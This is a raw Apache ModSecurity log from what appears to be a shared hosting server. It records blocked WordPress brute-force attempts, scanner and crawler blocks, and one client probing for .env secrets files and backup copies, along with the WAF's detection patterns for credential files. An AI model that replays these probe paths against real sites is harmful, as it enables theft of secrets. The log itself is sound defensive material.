[Tue May 26 12:49:13.191497 2026] [security2:error] [pid 448967:tid 449208] [client 167.160.73.239:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVJceXLPuWQsfM-UVSwHAAAAG8"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1244943&moderation-hash=9638e1b26cf6f7ba1053a7d653c10288
[Tue May 26 12:49:13.541768 2026] [security2:error] [pid 448967:tid 449098] [client 157.20.138.61:49456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJceXLPuWQsfM-UVSwIwAAAAE"]
[Tue May 26 12:49:13.542015 2026] [security2:error] [pid 448967:tid 449098] [client 157.20.138.61:49456] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJceXLPuWQsfM-UVSwIwAAAAE"]
[Tue May 26 12:49:13.596662 2026] [security2:error] [pid 448967:tid 449187] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJceXLPuWQsfM-UVSwHwAAAFo"]
[Tue May 26 12:49:13.886198 2026] [security2:error] [pid 448967:tid 449085] [remote 74.7.241.58:52602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVJceXLPuWQsfM-UVSwOQAAQnU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/shop/wp-content/plugins/yith-woocommerce-wishlist/plugin-fw/templates/fields
[Tue May 26 12:49:15.251736 2026] [security2:error] [pid 448967:tid 449121] [client 110.249.201.194:59964] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVJc-XLPuWQsfM-UVSw0AAAABg"]
[Tue May 26 12:49:16.600061 2026] [security2:error] [pid 448967:tid 449130] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJdOXLPuWQsfM-UVSw8QAAACE"]
[Tue May 26 12:49:19.334390 2026] [security2:error] [pid 448967:tid 449100] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJduXLPuWQsfM-UVSxQQAAAAM"]
[Tue May 26 12:49:22.550360 2026] [security2:error] [pid 448967:tid 449123] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJeuXLPuWQsfM-UVSxrQAAABo"]
[Tue May 26 12:49:24.379540 2026] [security2:error] [pid 448967:tid 449160] [client 157.20.138.61:49828] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEAAAAD8"]
[Tue May 26 12:49:24.379730 2026] [security2:error] [pid 448967:tid 449160] [client 157.20.138.61:49828] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEAAAAD8"]
[Tue May 26 12:49:24.901310 2026] [security2:error] [pid 448967:tid 449124] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJfOXLPuWQsfM-UVSyEwAAABs"]
[Tue May 26 12:49:27.845101 2026] [security2:error] [pid 448967:tid 449209] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJf-XLPuWQsfM-UVSycwAAAHA"]
[Tue May 26 12:49:30.523905 2026] [security2:error] [pid 448967:tid 449148] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJguXLPuWQsfM-UVSy6gAAADM"]
[Tue May 26 12:49:33.340271 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJhOXLPuWQsfM-UVSzNAAAAB8"]
[Tue May 26 12:49:35.061895 2026] [security2:error] [pid 448967:tid 449150] [client 157.20.138.61:50182] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzagAAADU"]
[Tue May 26 12:49:35.062032 2026] [security2:error] [pid 448967:tid 449150] [client 157.20.138.61:50182] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzagAAADU"]
[Tue May 26 12:49:35.689316 2026] [security2:error] [pid 448967:tid 449168] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzdwAAAEc"]
[Tue May 26 12:49:36.354842 2026] [security2:error] [pid 448967:tid 449179] [client 89.117.59.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJh-XLPuWQsfM-UVSzkAAAAFI"]
[Tue May 26 12:49:36.989069 2026] [security2:error] [pid 448967:tid 449194] [client 74.249.173.207:40709] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wk/index.php"] [unique_id "ahVJiOXLPuWQsfM-UVSztAAAAGE"]
[Tue May 26 12:49:38.663892 2026] [security2:error] [pid 448967:tid 449018] [remote 49.125.215.83:61338] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVJieXLPuWQsfM-UVSzvQAANDI"]
[Tue May 26 12:49:39.349854 2026] [security2:error] [pid 448967:tid 449168] [client 208.84.100.229:19026] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LwAAAEc"]
[Tue May 26 12:49:39.350038 2026] [security2:error] [pid 448967:tid 449113] [client 208.84.100.229:19046] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LAAAABA"]
[Tue May 26 12:49:39.350045 2026] [security2:error] [pid 448967:tid 449125] [client 208.84.100.229:19034] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0LgAAABw"]
[Tue May 26 12:49:39.351169 2026] [security2:error] [pid 448967:tid 449192] [client 208.84.100.229:18990] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVJi-XLPuWQsfM-UVS0MgAAAF8"]
[Tue May 26 12:49:39.421599 2026] [security2:error] [pid 448967:tid 449132] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJiuXLPuWQsfM-UVS0HQAAACM"]
[Tue May 26 12:49:41.845841 2026] [security2:error] [pid 448967:tid 449107] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJjeXLPuWQsfM-UVS0nAAAAAo"]
[Tue May 26 12:49:44.343443 2026] [security2:error] [pid 448967:tid 449174] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJj-XLPuWQsfM-UVS07gAAAE0"]
[Tue May 26 12:49:44.586276 2026] [security2:error] [pid 448967:tid 449065] [remote 146.196.64.107:38108] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.64.196.146.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVJkOXLPuWQsfM-UVS0_AAADWE"]
[Tue May 26 12:49:45.516693 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:50527] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1IQAAAGA"]
[Tue May 26 12:49:45.516817 2026] [security2:error] [pid 448967:tid 449193] [client 157.20.138.61:50527] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1IQAAAGA"]
[Tue May 26 12:49:45.548810 2026] [security2:error] [pid 448967:tid 449224] [client 208.84.100.229:19056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.copy"] [unique_id "ahVJkeXLPuWQsfM-UVS1JwAAAH8"]
[Tue May 26 12:49:45.781086 2026] [security2:error] [pid 448967:tid 449209] [client 74.249.173.207:40705] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/inputs.php"] [unique_id "ahVJkeXLPuWQsfM-UVS1KwAAAHA"]
[Tue May 26 12:49:45.871304 2026] [proxy:error] [pid 448967:tid 449113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:49:45.871363 2026] [proxy_http:error] [pid 448967:tid 449113] [client 185.169.4.152:61157] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:49:45.872379 2026] [proxy:error] [pid 448967:tid 449113] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 12:49:45.872411 2026] [proxy_http:error] [pid 448967:tid 449113] [client 185.169.4.152:61157] AH01114: HTTP: failed to make connection to backend: 127.0.0.1, referer: binance.com
[Tue May 26 12:49:46.995325 2026] [security2:error] [pid 448967:tid 449154] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJkuXLPuWQsfM-UVS1QQAAADk"]
[Tue May 26 12:49:47.732054 2026] [security2:error] [pid 448967:tid 448974] [remote 5.250.187.247:56006] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.187.250.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahVJk-XLPuWQsfM-UVS1WgAAbAY"]
[Tue May 26 12:49:48.075944 2026] [security2:error] [pid 448967:tid 449171] [client 85.208.96.209:36074] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-12th-16th/list/"] [unique_id "ahVJlOXLPuWQsfM-UVS1cgAAAEo"]
[Tue May 26 12:49:48.076044 2026] [security2:error] [pid 448967:tid 449171] [client 85.208.96.209:36074] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-12th-16th/list/"] [unique_id "ahVJlOXLPuWQsfM-UVS1cgAAAEo"]
[Tue May 26 12:49:48.346139 2026] [security2:error] [pid 448967:tid 449197] [client 208.84.100.229:25592] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1dgAAAGQ"]
[Tue May 26 12:49:48.351943 2026] [security2:error] [pid 448967:tid 449141] [client 208.84.100.229:25598] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1eAAAACw"]
[Tue May 26 12:49:48.451679 2026] [security2:error] [pid 448967:tid 449220] [client 208.84.100.229:25416] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1gwAAAHs"]
[Tue May 26 12:49:48.452137 2026] [security2:error] [pid 448967:tid 449222] [client 208.84.100.229:25518] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local~"] [unique_id "ahVJlOXLPuWQsfM-UVS1hwAAAH0"]
[Tue May 26 12:49:48.452205 2026] [security2:error] [pid 448967:tid 449169] [client 208.84.100.229:25414] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1hAAAAEg"]
[Tue May 26 12:49:48.452988 2026] [security2:error] [pid 448967:tid 449110] [client 208.84.100.229:25570] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.production.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1hgAAAA0"]
[Tue May 26 12:49:48.453314 2026] [security2:error] [pid 448967:tid 449097] [client 208.84.100.229:25462] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1iwAAAAA"]
[Tue May 26 12:49:48.453948 2026] [security2:error] [pid 448967:tid 449128] [client 208.84.100.229:25520] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1jgAAAB8"]
[Tue May 26 12:49:48.454000 2026] [security2:error] [pid 448967:tid 449211] [client 208.84.100.229:25530] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1jwAAAHI"]
[Tue May 26 12:49:48.454367 2026] [security2:error] [pid 448967:tid 449179] [client 208.84.100.229:25428] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env~"] [unique_id "ahVJlOXLPuWQsfM-UVS1kAAAAFI"]
[Tue May 26 12:49:48.454504 2026] [security2:error] [pid 448967:tid 449132] [client 208.84.100.229:25478] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.old"] [unique_id "ahVJlOXLPuWQsfM-UVS1kQAAACM"]
[Tue May 26 12:49:48.454532 2026] [security2:error] [pid 448967:tid 449195] [client 208.84.100.229:25540] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.copy"] [unique_id "ahVJlOXLPuWQsfM-UVS1jQAAAGI"]
[Tue May 26 12:49:48.455138 2026] [security2:error] [pid 448967:tid 449206] [client 208.84.100.229:25446] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.orig"] [unique_id "ahVJlOXLPuWQsfM-UVS1kgAAAG0"]
[Tue May 26 12:49:48.455209 2026] [security2:error] [pid 448967:tid 449198] [client 208.84.100.229:25438] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.swp"] [unique_id "ahVJlOXLPuWQsfM-UVS1kwAAAGU"]
[Tue May 26 12:49:48.455591 2026] [security2:error] [pid 448967:tid 449157] [client 208.84.100.229:25402] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.bak"] [unique_id "ahVJlOXLPuWQsfM-UVS1lgAAADw"]
[Tue May 26 12:49:48.456020 2026] [security2:error] [pid 448967:tid 449144] [client 208.84.100.229:25490] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "webmail.rehobothindependentcare.com"] [uri "/___proxy_subdomain_webmail/.env.local.backup"] [unique_id "ahVJlOXLPuWQsfM-UVS1lAAAAC8"]
